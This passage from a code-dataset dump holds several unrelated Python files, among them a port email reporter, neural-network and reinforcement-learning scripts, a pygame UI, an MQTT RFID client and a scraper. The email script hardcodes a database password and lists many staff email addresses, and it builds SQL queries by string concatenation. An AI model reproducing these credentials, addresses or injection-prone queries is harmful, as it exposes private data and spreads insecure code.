os.path.dirname(current_dir)\nsys.path.insert(0, parent_dir)\nfrom psw import mail_pass\n\nHOST = 'smtp.yandex.ru'\nFROM ='smartportdaly@yandex.ru'\n\nnameTerminal = {1: \"УТ-1\", 2: \"ГУТ-2\"}\ncc = [\n 'Vladimir.Grigoriev@nmtport.ru',\n 'Radion.Bespalov@nmtport.ru',\n 'Disp.Smen@nmtport.ru',\n 'Disp1.Smen@nmtport.ru',\n 'Oleg.Evsyukov@nmtport.ru', \n 'Alexander.Ostapchenko@nmtport.ru', \n # 'Alexander.Ostapchenko@yandex.ru', \n]\naddresses = {\n 1: [\n 'Petr.Gerasimenko@nmtport.ru',\n 'Fedor.Tormasov@nmtport.ru',\n 'Aleksey.Makogon@nmtport.ru',\n 'shift.engineer@nmtport.ru'\n ],\n 2: [\n ],\n}\ntitles = {\n 1: [\n \"номер усм \", \n \"начало смены
    (> 8:30)\", \n \"окончание перед обедом
    (< 12:00)\", \n \"начало после обеда
    (> 13:00)\", \n \"окончание перед тех. перерывом
    (< 16:30)\", \n 'начало после тех. перерыва
    (> 17:00)', \n 'окончание смены
    (< 19:30)',\n 'общие потери по крану
    (минут)',\n ],\n 2: [\n \"номер усм \", \n \"начало смены
    (> 20:30)\", \n \"окончание перед обедом
    (< 01:00)\", \n \"начало после обеда
    (> 02:00)\", \n \"окончание перед тех. перерывом
    (< 04:30)\", \n 'начало после тех. перерыва
    (> 05:00)', \n 'окончание смены
    (< 07:30)',\n 'общие потери по УСМ
    (минут)',\n ]\n}\n\nkrans = list_mechanisms.kran\nusm = list_mechanisms.usm\n\ndef getData(mech_id, date_shift, shift ):\n mech_id = str(mech_id)\n date_shift= str(date_shift) \n shift = str(shift)\n ServerName = \"192.168.99.106\"\n Database = \"nmtport\"\n UserPwd = \"ubuntu:Port2020\"\n Driver = \"driver=ODBC Driver 17 for SQL Server\"\n engine = create_engine('mssql+pyodbc://' + UserPwd + '@' + ServerName + '/' + Database + \"?\" + Driver)\n sql =\"\"\"\n SELECT TOP (1000) [id]\n ,[mechanism_id]\n ,[value]\n ,[value2]\n ,[value3]\n ,dateadd(hour, 10, [timestamp]) as time\n ,[date_shift]\n ,[shift]\n ,[terminal]\n FROM [nmtport].[dbo].[post]\n where \n mechanism_id=\"\"\" + mech_id + \"\"\" and \n date_shift='\"\"\" + date_shift + \"\"\"' and\n shift=\"\"\" + shift + \"\"\" \n order by timestamp \"\"\"\n\n df = pd.read_sql(sql, engine)\n df = df.set_index('time')\n return df\n\n\ndef get_yellow_diapozones (date, shift):\n tommorow = date + timedelta(days=1)\n date = str(date) + \" \"\n tommorow = str(tommorow) + \" \"\n if shift == 1:\n diapozones = {\n \"start\" : [date + '08:00', date + '08:30'],\n \"work_1\" : [date + '08:30', date + '11:58'],\n \"lanch_start\" : [date + '11:58', date + '12:00'],\n \"lanch_finish\" : [date + '13:00', date + '13:02'],\n \"work_2\" : [date + '13:02', date + '16:28'],\n \"tea_start\" : [date + '16:28', date + '16:30'],\n \"tea_finish\" : [date + '16:30', date + '17:02'],\n \"work_3\" : [date + '17:02', date + '19:30'],\n \"finish\" : [date + '19:30', date + '20:00'],\n }\n if shift == 2:\n diapozones = {\n \"start\" : [date + '20:00', date + '20:30'],\n \"work_1\" : [date + '20:30', tommorow + '00:58'],\n \"lanch_start\" : [tommorow + '00:58', tommorow + '01:00'],\n \"lanch_finish\" : [tommorow + '02:00', tommorow + '02:02'],\n \"work_2\" : [tommorow + '02:02', tommorow + '04:28'],\n \"tea_start\" : [tommorow + '04:28', tommorow + '04:30'],\n \"tea_finish\" : [tommorow + '05:00', tommorow + '05:02'],\n \"work_3\" : [tommorow + '05:02', tommorow + '07:30'],\n \"finish\" : [tommorow + '07:30', tommorow + '08:00'],\n }\n return diapozones\n\ndef sum_diapozone(diapozone):\n summ = 0\n for v, v3 in zip(diapozone['value'], diapozone['value3']): #lever, roller \n if v>0 and v3>5:\n summ += 1\n return summ\n\ndef diapozone(df, diapozone):\n return df[diapozone[0] : diapozone[1]]\n\n\ndef get_mech_diapozones(df, diapozones):\n return {\n \"start\" : diapozone(df, diapozones['start']),\n \"work_1\" : diapozone(df, diapozones['work_1']),\n \"lanch_start\" : diapozone(df, diapozones['lanch_start']),\n \"lanch_finish\" : diapozone(df, diapozones['lanch_finish']),\n \"work_2\" : diapozone(df, diapozones['work_2']),\n \"tea_start\" : diapozone(df, diapozones['tea_start']),\n \"tea_finish\" : diapozone(df, diapozones['tea_finish']),\n \"work_3\" : diapozone(df, diapozones['work_3']),\n \"finish\" : diapozone(df, diapozones['finish']),\n }\n\ndef sum_mech_diapozones(diapozones):\n return { num : sum_diapozone(diapozone) for num, diapozone in diapozones.items()}\n\ndef get_time(mech_sum, mech_diapozones, condition):\n work_zone = 30\n work, period, position = condition\n if mech_sum[work] > work_zone and not mech_sum[period]:\n border = mech_diapozones[work].query('value > 0 or value3 > 5').iloc[position]\n return border.name \n return None\n\ndef get_hour_and_minutes(time):\n if time:\n h=time.hour\n m=time.minute\n if h<10:\n h = '0' + str(h)\n if m<10:\n m = '0' + str(m)\n return f'{h}:{m}'\n return '' \n\ndef convert_time_to_str(times):\n return [get_hour_and_minutes(time) for time in times]\n\ndef save_to_xlsx(list_kran, name):\n wb=Workbook()\n wb.create_sheet('kran_work_time')\n del wb['Sheet']\n ws = wb['kran_work_time']\n titles = [\"number\", \"start\", \"start_lanc\", \"finish_lanch\", \"start_tea\", 'finish_tea', 'finish']\n for en, title in enumerate(titles, 1):\n ws.cell(row=1, column=en, value=title)\n for en, item in enumerate(list_kran, 2):\n for col, value in enumerate(item, 1):\n ws.cell(row=en, column=col, value=value)\n wb.save(filename = 'kran_periods'+name+'.xlsx')\n\ndef find_periods(date, shift, terminal):\n diapozones = get_yellow_diapozones(date, shift)\n mechanisms = {} \n search_conditions = (\n ('work_1', 'start', 0),\n ('work_1', 'lanch_start', -1),\n ('work_2', 'lanch_finish', 0),\n ('work_2', 'tea_start', -1),\n ('work_3', 'tea_finish', 0),\n ('work_3', 'finish', -1)\n )\n for usm_num, usm_id in usm.items():\n df = getData(usm_id, date, shift)\n mech_diapozones = get_mech_diapozones(df, diapozones)\n mech_sum = sum_mech_diapozones(mech_diapozones)\n mech_zones = []\n for condition in search_conditions:\n mech_zones.append(get_time(mech_sum, mech_diapozones, condition))\n\n if any(mech_zones):\n mechanisms[usm_num] = mech_zones\n # print(mechanisms)\n return mechanisms\n\ndef get_bg(time, red_zones, en):\n\n if time is None:\n return 'bg-white'\n if en in [0, 2, 4]:\n if time > red_zones[en]:\n return 'bg-red'\n if en in [1, 3, 5]:\n if time < red_zones[en]:\n return 'bg-red'\n return 'bg-yellow'\n\ndef get_red_zones(date, shift):\n format = '%Y-%m-%d %H:%M'\n diapozones = get_yellow_diapozones(date, shift)\n condition = [\n datetime.strptime(diapozones['start'][1], format) + timedelta(minutes=10), # >\n datetime.strptime(diapozones['lanch_start'][0], format) - timedelta(minutes=5), # <\n datetime.strptime(diapozones['lanch_finish'][1], format) + timedelta(minutes=5), # >\n datetime.strptime(diapozones['tea_start'][0], format) - timedelta(minutes=5), # <\n datetime.strptime(diapozones['tea_finish'][1], format) + timedelta(minutes=5), # >\n datetime.strptime(diapozones['finish'][0], format) - timedelta(minutes=10), # <\n ]\n return condition\n\ndef get_border_zones(date, shift):\n format = '%Y-%m-%d %H:%M'\n diapozones = get_yellow_diapozones(date, shift)\n condition = [\n datetime.strptime(diapozones['start'][1], format) ,\n datetime.strptime(diapozones['lanch_start'][1], format), \n datetime.strptime(diapozones['lanch_finish'][0], format),\n datetime.strptime(diapozones['tea_start'][1], format),\n datetime.strptime(diapozones['tea_finish'][0], format),\n datetime.strptime(diapozones['finish'][0], format),\n ]\n return condition\n\n\ndef add_bg(times, red_zones):\n time_and_bg = []\n for en, time in enumerate(times):\n time_and_bg.append((get_bg(time, red_zones, en), time))\n return time_and_bg\n\ndef make_table(data, date, shift):\n if not data:\n return None\n red_zones = get_red_zones(date, shift)\n border_zones = get_border_zones(date, shift)\n total = 0\n table = '

    ' + str(shift) + \" смена

    \" \n for cell in titles[shift]:\n table += f''\n table += ''\n for kran_num, values in data.items():\n table += ' '\n row = add_bg(values, red_zones)\n count_sum = count_different(values, border_zones)\n total += count_sum\n for bg, time in row:\n value = get_hour_and_minutes(time)\n table += f''\n table += f''\n table += ''\n table += '' + ''*7 + ''\n table += '
    {cell}
    ' + str(kran_num) + ' {value} ' + str(count_sum) + '
    ' + str(total) + '
    ' \n return table\n\ndef count_different(real_time, border_zones):\n assert len(border_zones) == len(real_time)\n sum_time = 0\n for i in range(len(border_zones)):\n if real_time[i] is not None:\n dt = (real_time[i] - border_zones[i]).total_seconds()\n sum_time += abs(dt/60)\n return int(sum_time)\n\ndef make_html(table1, table2, date):\n if table1 is None:\n table1 = \"\"\n if table2 is None:\n table2 = \"\"\n html = \"\"\"\n \n \n \n \n \n

    \"\"\" + str(date) + \"\"\"

    \n

    Позднее начало, ранее окончание по \n производственным периодам

    \"\"\" + table1 + \"\"\" \n
    \"\"\" + table2 + \"\"\" \n
    \n SmartPort \n \n \n \"\"\"\n return html\ndef mail_to_str_list(mail):\n msg = \"\"\n for m in mail:\n msg += m + '; '\n return msg\n\ndef sent_email(periods1, periods2, date, terminal):\n tmp1 = [[k, *convert_time_to_str(v)] for k,v in periods1.items()]\n tmp2 = [[k, *convert_time_to_str(v)] for k,v in periods2.items()]\n data = tmp1 +[['-']*7]+ tmp1\n SUBJECT = f\"простои УСМ {nameTerminal[terminal]} {str(date)}\"\n text = str(date) + \"\"\"\n Позднее начало, ранее окончание по производственным периодам\n {table}\n SmartPort\n \"\"\"\n table1 = make_table(periods1, date, 1)\n table2 = make_table(periods2, date, 2)\n html = make_html(table1, table2, date)\n\n text = text.format(table=tabulate(data, headers=\"firstrow\", tablefmt=\"grid\"))\n html = html.format(table=tabulate(data, headers=\"firstrow\", tablefmt=\"html\"))\n TO = '' \n\n message = MIMEMultipart(\n \"alternative\", None, [MIMEText(text), MIMEText(html,'html')])\n message['Subject'] = SUBJECT\n message['From'] = FROM\n message['To'] = \", \".join(addresses[terminal])\n message['Cc'] = ', '.join(cc)\n recipients = addresses[terminal] + cc\n # with open('mail.html', 'w') as f: # create html file\n # f.write(html)\n # f.close()\n server = smtplib.SMTP_SSL(HOST, 465)\n server.ehlo()\n server.login(FROM, mail_pass)\n server.sendmail(FROM, recipients, message.as_string())\n server.quit()\n\n\ndef every_day():\n yesterday = datetime.now().date() - timedelta(days=1)\n UT_shift_1 = find_periods(yesterday, 1, 1)\n UT_shift_2 = find_periods(yesterday, 2, 1)\n if UT_shift_1 or UT_shift_2:\n sent_email(UT_shift_1, UT_shift_2, yesterday, 1)\n else:\n print('empty')\n\n\nif __name__ == \"__main__\":\n\n print('Start USM')\n while True:\n hour = datetime.now().hour\n minute = datetime.now().minute\n if hour==10 and minute==00:\n print(datetime.now())\n every_day()\n time.sleep(60)\n time.sleep(15)\n\n\n\n\n\n\n","sub_path":"mail_time_work/mail_time_usm.py","file_name":"mail_time_usm.py","file_ext":"py","file_size_in_byte":13934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"391834282","text":"# @Time : 2021/07/21 19:28\n# @Author : SY.M\n# @FileName: encoder.py\n\n\nimport torch\nfrom module.for_MTS.multiHeadAttention import MultiHeadAttention\nfrom module.for_MTS.feedforward import PositionFeedforward\n\n\nclass Encoder(torch.nn.Module):\n def __init__(self,\n q: int,\n v: int,\n h: int,\n d_model: int,\n d_hidden: int,\n dropout: float = 0.2):\n super(Encoder, self).__init__()\n\n self.MHA = MultiHeadAttention(d_model=d_model, q=q, v=v, h=h)\n self.feedforward = PositionFeedforward(d_model=d_model, d_hidden=d_hidden)\n self.dropout = torch.nn.Dropout(p=dropout)\n self.layernorm = torch.nn.LayerNorm(d_model)\n\n def forward(self,\n x: torch.Tensor,\n stage: str):\n residual = x\n x, heatmap_score = self.MHA(x, stage)\n x = self.dropout(x)\n x = self.layernorm(x + residual)\n\n x = self.feedforward(x)\n\n return x, heatmap_score","sub_path":"Gated_Transfomer_Network/module/for_MTS/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"416526740","text":"# Xinwu Qian 2019-02-06\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\", category=RuntimeWarning)\r\n# This implements independent q learning approach\r\nuse_gpu = 1\r\nimport os\r\nimport config\r\nimport time\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport network\r\nimport env_agent\r\nimport matplotlib.pyplot as plt\r\nfrom datetime import datetime\r\nimport json\r\nimport glob\r\n\r\nplt.ion()\r\nplt.figure(1,figsize=(10, 6))\r\nimport demand_gen\r\n\r\nnp.set_printoptions(precision=2)\r\nif use_gpu == 0:\r\n os.environ['CUDA_VISIBLE_DEVICES'] = '-1'\r\n\r\n# force on gpu\r\nconfig1 = tf.ConfigProto()\r\nconfig1.gpu_options.allow_growth = True\r\n\r\nfilename='log/IDRQN_reward_log_' + datetime.now().strftime('%Y-%m-%d %H-%M-%S')\r\nreward_out = open(filename + '.csv', 'w+')\r\nconfigout={'NET':config.NET_CONFIG,'TRAIN':config.TRAIN_CONFIG,'SIMU':config.SIMULATION_CONFIG}\r\njson.dump(configout, open(filename+'.json',\"w\"))\r\n#set rng seed\r\nnp.random.seed(config.TRAIN_CONFIG['random_seed'])\r\n\r\nmain_env=env_agent.env_agent()\r\nN_station=main_env.N_station\r\n\r\n#tf session initialiaze\r\nmain_env.create_session()\r\n#stand agent creation\r\nmain_env.create_stand_agent()\r\nglobal_init = tf.global_variables_initializer()\r\nmain_env.sess.run(global_init)\r\nsaver = tf.train.Saver(max_to_keep=5)\r\ndistance=main_env.distance\r\n\r\nilist=[]\r\nrlist=[]\r\nrlist_relo=[]\r\nrlist_wait=[]\r\n\r\nfor i in range(main_env.num_episodes):\r\n main_env.initialize_episode()\r\n # return the current state of the system\r\n sP, tempr, featurep,score,tr2 =main_env.env.get_state()\r\n # process the state into a list\r\n # replace the state action with future states\r\n feature=featurep\r\n s = network.processState(sP, N_station)\r\n pres=s\r\n prea=np.zeros((N_station))\r\n\r\n within_frame_reward = 0\r\n frame_skipping = 1\r\n rAll = 0\r\n rAll_unshape=0\r\n j = 0\r\n total_serve = 0\r\n total_leave = 0\r\n prediction_time=0\r\n targetz_time=0\r\n training_time=0\r\n buffer_count=0;\r\n tinit=time.time()\r\n\r\n #bandit swapping scheme\r\n\r\n while j < main_env.max_epLength:\r\n tall=time.time()\r\n j += 1\r\n hour=j//config.TRAIN_CONFIG['hour_length']\r\n tick=hour/(config.TRAIN_CONFIG['max_epLength']/config.TRAIN_CONFIG['hour_length'])\r\n main_env.tick=tick\r\n a1,a2,initial_rnn_state = main_env.take_action([s],feature,j,tick) #a1 determines if relocate or not, a2 determines which station to relocate\r\n #a,invalid_action=main_env.take_action(feature,[s],j,tick)\r\n if config.TRAIN_CONFIG['use_tracker']:\r\n main_env.sys_tracker.record(s, a2)\r\n # move to the next step based on action selected\r\n ssp, lfp = main_env.env.step(a2)\r\n total_serve += ssp\r\n total_leave += lfp\r\n # get state and reward\r\n s1P, r, featurep,score,r2 = main_env.env.get_state()\r\n s1 = network.processState(s1P, main_env.N_station)\r\n vehicle_available=[0]*N_station; #0 means no vehicle available after the transition, 1 means available\r\n for k in range(N_station):\r\n if main_env.env.taxi_in_q[k]: vehicle_available[k]=1\r\n\r\n new_rnn, _ = main_env.measure_rnn([s1],j,[[tick]],[np.array([main_env.e])],1,1)\r\n bs_mask= main_env.bs_mask\r\n #record buffer\r\n #smaller e value\r\n main_env.epsilon_decay()\r\n #buffer record\r\n newr=r*np.ones((main_env.N_station))\r\n v1=np.reshape(np.array([s, a2, newr, s1,feature,score,featurep,main_env.e,tick,a1,new_rnn[0],vehicle_available,bs_mask]), [1,13])\r\n v2=np.reshape(np.array([feature,a2,score]),[1,3]) #bandit state to record\r\n main_env.buffer_record(v1,v2)\r\n main_env.process_bandit_buffer(20)\r\n main_env.train_agent()\r\n\r\n rAll += r\r\n rAll_unshape+=r2\r\n # swap state\r\n s = s1\r\n sP = s1P\r\n reloP=a1\r\n sa=a2 #past action\r\n feature=featurep\r\n #preocess bandit buffer\r\n print('Confidence bound:',main_env.linucb_agent.return_upper_bound(feature))\r\n #main_env.process_bandit_buffer()\r\n main_env.sys_tracker.record_time(main_env.env)\r\n regret,arm_err=main_env.bandit_regret()\r\n main_env.update_bandit()\r\n print('the regret of the this round is:',regret,' max_err:',max(arm_err))\r\n ilist.append(i)\r\n rlist.append(rAll); rlist_relo.append(rAll_unshape[2]);rlist_wait.append(rAll_unshape[1])\r\n plt.clf()\r\n plt.plot(ilist,rlist, marker='o', markerfacecolor='blue', markersize=4, color='skyblue', linewidth=4,label='totalreward')\r\n # plt.plot(ilist,rlist_relo,marker='d', color='red', linewidth=2,label='relocation')\r\n # plt.plot(ilist,rlist_wait, marker='s', color='red', linewidth=2, linestyle='dashed', label=\"wait\")\r\n plt.xlabel('Episode')\r\n plt.legend()\r\n plt.pause(0.01)\r\n print('Episode:', i, ', totalreward:', rAll, ', old reward:',rAll_unshape,', total serve:', total_serve, ', total leave:', total_leave, ', total_cpu_time:',time.time()-tinit,\r\n ', terminal_taxi_distribution:', [len(v) for v in main_env.env.taxi_in_q], ', terminal_passenger:',\r\n [len(v) for v in main_env.env.passenger_qtime], main_env.e,main_env.eliminate_threshold)\r\n reward_out.write(str(i) + ',' + str(rAll) + '\\n')\r\n # if i>0:\r\n # print('Max relo norm:',max(main_env.relo_nornm), 'Mean relo norm:',np.mean(main_env.relo_nornm))\r\n # print('Max act norm:', max(main_env.act_norm), 'Mean act norm:', np.mean(main_env.act_norm))\r\n # Periodically save the model.\r\n # if i % 15 == 0 and i != 0:\r\n # saver.save(main_env.sess, main_env.path + '/model-' + str(i) + '.cptk')\r\n # print(\"Saved Model\")\r\n\r\n# summaryLength,h_size,sess,mainQN,time_per_step)\r\n# saver.save(sess,path+'/model-'+str(i)+'.cptk')\r\nmain_env.sys_tracker.save('IDRQN')\r\nmain_env.sys_tracker.playback(-1)\r\nreward_out.close()\r\n","sub_path":"Model_C51_compact/new_IDRQN_main.py","file_name":"new_IDRQN_main.py","file_ext":"py","file_size_in_byte":6173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"571262553","text":"from .simboloVirtual import SimboloVirtual\r\nfrom .simboloBase import SimboloBase\r\nfrom azoe.engine import EventHandler\r\nfrom azoe.widgets import ContextMenu\r\nfrom pygame import mouse, Surface\r\n\r\n\r\nclass MetaSimbolo(SimboloBase):\r\n \"\"\"Metaclass para no repetir onMouseOver\"\"\"\r\n copia = None\r\n image = None\r\n\r\n def on_mouse_over(self):\r\n if self.pressed:\r\n x, y = mouse.get_pos()\r\n z = self.z\r\n pos = x, y, z\r\n dx, dy = self._arrastrar()\r\n if dx != 0 or dy != 0:\r\n self.data['colisiones'] = self.img_cls\r\n self.data['cols_code'] = self.cls_code\r\n self.copia = SimboloVirtual(self, self.image.copy(), pos, self.data)\r\n EventHandler.set_focus(self.copia)\r\n self.pressed = False\r\n else:\r\n pass # showTooltip()\r\n\r\n def imagen_positiva(self):\r\n self.image = self.img_pos\r\n\r\n def imagen_negativa(self):\r\n if self.img_cls is not None:\r\n img = self.img_cls.copy()\r\n img.blit(self.img_neg, (0, 0), special_flags=6)\r\n self.image = img\r\n else:\r\n img = Surface(self.image.get_size())\r\n img.set_alpha(0)\r\n self.image = img\r\n\r\n def renombrar(self, texto):\r\n self._nombre = texto\r\n self.nombre = self.parent.nombre + '.Simbolo.' + self._nombre\r\n self.data['nombre'] = texto\r\n\r\n\r\nclass SimboloSimple(MetaSimbolo):\r\n copiar = False\r\n\r\n def __init__(self, parent, data):\r\n super().__init__(parent, data)\r\n self.img_pos = self._imagen.copy()\r\n self.img_neg = self._crear_transparencia(self._imagen.copy())\r\n self.image = self.img_pos\r\n self.context = ContextMenu(self)\r\n\r\n\r\nclass SimboloMultiple(MetaSimbolo):\r\n rot_idxs = {}\r\n curr_rot = 0\r\n\r\n def __init__(self, parent, data):\r\n self.imgs_pos = self.cargar_anims(data['imagenes'], ['S', 'I', 'D'])\r\n self.imgs_neg = self.cargar_anims(data['imagenes'], ['S', 'I', 'D'], True)\r\n data['image'] = self.imgs_pos['Sabajo']\r\n self.curr_rot = 0\r\n super().__init__(parent, data)\r\n self.img_pos = self.imgs_pos['Sabajo']\r\n self.img_neg = self.imgs_neg['Sabajo']\r\n self.image = self.img_pos\r\n\r\n cmds = [\r\n {'nom': \"Abajo\", 'cmd': lambda: self.cambiar_imagen('abajo')},\r\n {'nom': \"Arriba\", 'cmd': lambda: self.cambiar_imagen('arriba')},\r\n {'nom': \"Derecha\", 'cmd': lambda: self.cambiar_imagen('derecha')},\r\n {'nom': \"Izquierda\", 'cmd': lambda: self.cambiar_imagen('izquierda')}]\r\n\r\n self.context = ContextMenu(self, cmds)\r\n\r\n def cambiar_imagen(self, direccion):\r\n self.img_pos = self.imgs_pos['S' + direccion]\r\n self.img_neg = self.imgs_neg['S' + direccion]\r\n self.curr_rot = self.rot_idxs['S' + direccion]\r\n self.image = self.img_pos\r\n self.data['image'] = self.image\r\n self.data['rot'] = self.curr_rot\r\n\r\n def cargar_anims(self, spritesheet, seq, alpha=False):\r\n dicc, keys = {}, []\r\n dires = ['abajo', 'arriba', 'izquierda', 'derecha']\r\n\r\n for L in seq:\r\n for D in dires:\r\n keys.append(L + D)\r\n\r\n for key in keys:\r\n idx = keys.index(key)\r\n if not alpha:\r\n dicc[key] = spritesheet[idx]\r\n self.rot_idxs[key] = idx\r\n else:\r\n dicc[key] = self._crear_transparencia(spritesheet[idx])\r\n return dicc\r\n","sub_path":"rundata/simbolos/simboloPanel.py","file_name":"simboloPanel.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"487275764","text":"#Lose By Playing 2,5\nimport random\np1dice = 5\np2dice = 5\np1sum = 0\np2sum = 0\n\ndef roll_decide():\n roll = random.randint(1,6)\n if roll == 2 or roll ==5:\n return \"lose\"\n else:\n print(roll)\n return roll\ndef play():\n while p1dice >= 1:\n curr = roll_decide()\n if curr == \"lose\":\n print(\"You lost a dice\")\n p1dice-=1\n else:\n p1sum+=curr\n print(\"Player 1 Score:\",p1sum)\n while p2dice >= 1:\n curr = roll_decide()\n if curr == \"lose\":\n print(\"You lost a dice\")\n p2dice-=1\n else:\n p2sum+=curr\n print(\"Player 2 Score:\",p2sum)\nplay()\n","sub_path":"stuck_in_the_mud.py","file_name":"stuck_in_the_mud.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159390712","text":"import os\nimport time\nimport sys\nimport serial \nimport paho.mqtt.client as mqtt\nimport paho.mqtt.publish as publish\nfrom config import Config\nfrom models.rfCards import *\nimport threading\nallLoc=LocationDetails.query.all() \nallLoc=allLoc[0] if allLoc else {id:None}\n\n\ndef mqttProcess():\n\n def on_log(client, userdata, level, buf):\n print (\"This is the buffer {}\".format(buf))\n\n\n def on_publish(client, obj, mid):\n print(\"This is the mid In on Pub call back: \" + str(mid))\n\n def on_message(client, userdata, msg):\n print (\"######################\")\n print (\"Topic: \", msg.topic + ' Message: ' + str(msg.payload))\n print (\"######################\")\n\n\n def read_rfid(): \n ser = serial.Serial (\"/dev/ttyUSB0\") #Open named port \n ser.baudrate = 9600 #Set baud rate to 9600\n data = ser.read(12) #Read 12 characters from serial port to data\n ser.close() #Close port \n return {\"data\":data,\"status\":200} \n\n def start(): \n while(1): \n data=read_rfid()\n if (data.get(\"status\",False)):\n print (\"Data insude \",data[\"data\"],Config.CLIENT_topic.format(allLoc.id)) \n client.publish(Config.CLIENT_topic.format(allLoc.id),data[\"data\"], qos=2, retain=False) \n else:\n print(\"data not received \")\n \n def on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \" + str(rc))\n print (\"Making Default Values____________________________________________________\")\n client.subscribe(\"/home/rfid/#\")\n threading.Thread(target=start).start()\n \n client = mqtt.Client()\n client.on_connect = on_connect\n client.on_message = on_message\n client.on_publish = on_publish\n client.on_log = on_log\n client.tls_set('/etc/ssl/certs/ca-certificates.crt',tls_version=2)\n client.username_pw_set(Config.CLIENT_username,Config.CLIENT_password)\n client.connect(Config.HOSTNAME, Config.CLIENT_port, 60)\n client.loop_forever()\n\nmqttProcess()","sub_path":"clientMqtt.py","file_name":"clientMqtt.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"351668776","text":"\"\"\"\nAuthor: Dominik Rumian\n2019-03-30\n\nSimple calculator for combination numbers working in GUI mode\n\"\"\"\n\nfrom tkinter import *\n\n\ndef factorial(n):\n \"\"\"\n Computes factorial of given number\n :param n: number of which factorial should be computed\n :return: factorial of n\n \"\"\"\n if n == 0:\n return 1\n else:\n return n * factorial(n - 1)\n\n\ndef multiplication_line(start, end):\n \"\"\"\n Multiplicates numbers from start to end like:\n (start) * (start - 1) * .... * (start - k) * (end)\n :param start: starting point\n :param end: ending point\n :return: returns product of described line\n \"\"\"\n product = start\n for i in range(start - 1, end - 1, -1):\n product *= i\n return product\n\n\ndef calculate_comb_num(n, k):\n \"\"\"\n Computes the value of combination number determined by given 'n' and 'k'\n :param n:\n :param k:\n :return: value of combination number, -1 if input doesn't meet the conditions for comb. num\n \"\"\"\n if k > n:\n return -1\n if k == 0:\n return 1\n out_n = multiplication_line(n, n - k + 1)\n out_k = factorial(k)\n return out_n / out_k\n\n\ndef compute():\n \"\"\"\n Performs computation using GUI\n :return:\n \"\"\"\n n = int(n_box.get())\n k = int(k_box.get())\n\n com_num_val = calculate_comb_num(n, k)\n\n result.delete('1.0', END)\n\n if com_num_val == -1:\n result.insert(END, \"Please enter numbers\\nfrom interval\\n'n >= k >= 0'\")\n else:\n result.insert(END, \"%d\" % com_num_val)\n\n\n\"\"\"\nGUI for the calculator\n\"\"\"\n# Creating GUI\nwindow = Tk()\nwindow.title(\"Combination numbers calculator\")\nwindow.geometry(\"320x240\")\n\n# Frames\n# Frames create individual boxes, into we can input out buttons, entries etc.\n# relative to each other, not relative to whole window\ninput_variables = Frame(window)\ninput_variables.grid(row=0, column=0, sticky=W)\n\nbuttons = Frame(window)\nbuttons.grid(row=1, column=0, sticky=W)\n\nresults = Frame(window)\nresults.grid(row=2, column=0, sticky=W)\n\n# Labels\nLabel(input_variables, text=\"n:\").grid(row=0, column=0, sticky=W)\nLabel(input_variables, text=\"k:\").grid(row=1, column=0, sticky=W)\n\nLabel(results, text=\"Result:\").grid(row=1, column=0, sticky=W)\n\n# Input boxes\nn_box = Entry(input_variables, width=20, bg=\"light grey\")\nn_box.grid(row=0, column=1, sticky=W)\n\nk_box = Entry(input_variables, width=20, bg=\"light grey\")\nk_box.grid(row=1, column=1, sticky=W)\n\n# Button\nButton(buttons, text=\"Compute\", width=6, command=compute).grid(row=0, column=0, sticky=W)\n\n# Output boxes\nresult = Text(results, width=22, height=5, bg=\"light gray\")\nresult.grid(row=2, column=0, sticky=W)\n\n# Looping\nwindow.mainloop()\n","sub_path":"Combination_numbers_calculator.py","file_name":"Combination_numbers_calculator.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"164256579","text":"#!/usr/bin/env python3\n\nfrom urllib import request\nimport MySQLdb, _mysql_exceptions\nimport re\nfrom . import dbcfg\n\nclass Spider:\n def __init__(self, entry, path):\n self.entry = entry\n self.ROOT_URL = 'http://nashihou.net/'\n self.path = path\n\n def read_page(self, url):\n content = request.urlopen(url)\n return content.read().decode('gbk')\n\n def extract_tags_url_from_tag_page(self):\n page_content = self.read_page(self.entry)\n page_content = self.remove_Lf(page_content)\n pattern = re.compile('
    (.*?)
    ')\n result = re.search(pattern, page_content)\n if result:\n tags = result.group(1).strip().split('')\n urls = {}\n for tag in tags:\n title_pattern = re.compile('title=\"(.*?)\"')\n title = re.search(title_pattern, tag)\n href_pattern = re.compile('href=\"(.*?)\"')\n href = re.search(href_pattern, tag)\n if title and href:\n urls[title.group(1).strip()] = self.ROOT_URL+(href.group(1).strip().replace('amp;', '')+'&type=thread')\n\n return urls\n else:\n return None\n\n def extract_page_url_from_certain_tag(self, url):\n page_content = self.read_page(url)\n page_content = self.remove_Lf(page_content)\n #print(page_content, '')\n pattern = re.compile('
    1(.*?)
    ')\n items = re.findall(pattern, page_content)\n urls = [item.replace('amp;', '') for item in items]\n #print(urls, ' ')\n return urls\n\n def extract_page_from_certain_article(self, url):\n page_content = self.read_page(url)\n page_content = self.remove_Lf(page_content)\n title_pattern = re.compile('(.*?) .*?')\n title = re.search(title_pattern, page_content)\n pattern = re.compile('.*?(.*?)', re.DOTALL)\n article = re.search(pattern, page_content)\n if article:\n article = article.group(1).strip()\n pattern = re.compile('
    |(

    )')\n article = re.sub(pattern, '\\n', article)\n\n article = self.replace_img(article)\n\n #print(article, '')\n pattern = re.compile('(.*?)\\n(.*?)\\n(.*?)
